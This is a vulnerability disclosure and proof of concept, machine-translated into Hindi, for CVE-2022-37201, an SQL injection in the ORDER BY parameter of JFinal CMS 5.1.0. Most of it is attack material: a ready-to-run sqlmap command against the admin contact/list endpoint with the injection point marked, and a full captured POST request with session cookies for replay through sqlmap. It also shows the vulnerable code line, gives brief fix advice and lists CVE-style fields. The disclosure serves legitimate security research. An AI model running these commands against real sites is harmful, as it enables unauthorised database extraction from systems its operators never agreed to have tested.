
CVE-2022-37201 प्रूफ ऑफ कॉन्सेप्ट
CVE-2022-37201 POC
सबसे पहले, आपको sqlmap इंस्टॉल करना चाहिए
आपको सेट करने की आवश्यकता है
फिर शेल चलाएँ
sqlmap -u http://targetDomainOrIP/jfinal_cms/jfinal_cms/admin/contact/list --thread 8 --batch --smart --random-agent --data "
form.orderColumn=*&form.orderAsc=&attr.name=%E4%B8%89&totalRecords=2&pageNo=1&pageSize=20&length=10" --cookie " your cookie " --current-db
image-20220730053527316
कभी-कभी आपको जानना चाहिए कि /jfinal_cms/ आवश्यक नहीं है, आपको रूट का निर्णय लेना होगा
आप इंटरफ़ेस /system/menu/list का कोड देख सकते हैं
sql.append(" order by ").append(orderBy);
यहाँ एक SQL स्टेटमेंट सीधे जोड़ा गया है
और भी
SQL इंजेक्शन को रोकने का कोई उपाय नहीं है क्योंकि यहाँ SQL इंजेक्शन आवश्यक है
इस फंक्शन पॉइंट का विश्लेषण करके, मैंने पाया कि orderby का इंजेक्शन निश्चित है, जैसे id, name, menu key, तो आप पैरामीटराइज्ड क्वेरी का उपयोग करने या एक व्हाइटलिस्ट बनाने का प्रयास कर सकते हैं
मेरा परीक्षण
POST /jfinal_cms/admin/contact/list HTTP/1.1
Host: 172.30.48.1
Content-Length: 98
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://172.30.48.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://172.30.48.1/jfinal_cms/admin/contact/list
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=BF13B42EDFC3DEC180959D6DF143BD18; Hm_lvt_1040d081eea13b44d84a4af639640d51=1659122360; session_user="wgPmpe3hEuJWIL+I+kHtxqag1wutWsMhm6eaAgoJH0c="
Connection: close
form.orderColumn=*&form.orderAsc=&attr.name=%E4%B8%89&totalRecords=2&pageNo=1&pageSize=20&length=10
इसे sqlmap में चलाएँ!!! -r का उपयोग करें
[सुझाया गया विवरण] JFinal CMS 5.1.0 SQL इंजेक्शन के लिए असुरक्षित है।
[अतिरिक्त जानकारी] https://github.com/AgainstTheLight/someEXP_of_jfinal_cms/blob/main/jfinal_cms/sql4.md
[भेद्यता प्रकार] SQL इंजेक्शन
[उत्पाद विक्रेता] विकास समूह
[प्रभावित उत्पाद कोड बेस] https://github.com/jflyfox/jfinal_cms - JFinal CMS 5.1.0
[प्रभावित घटक] ये इंटरफ़ेस एक ही घटक का उपयोग नहीं करते हैं, न ही उनमें फ़िल्टर हैं, बल्कि प्रत्येक अपनी स्वयं की SQL संयोजन विधि का उपयोग करता है, जिसके परिणामस्वरूप SQL इंजेक्शन होता है।
[हमले का प्रकार] दूरस्थ
[प्रभाव कोड निष्पादन] सत्य
[प्रभाव सूचना प्रकटीकरण] सत्य
[हमले के वेक्टर] उपयोगकर्ता लॉगिन आवश्यक है
[संदर्भ] https://github.com/AgainstTheLight/someEXP_of_jfinal_cms/blob/main/jfinal_cms/sql4.md
[खोजकर्ता] jw5t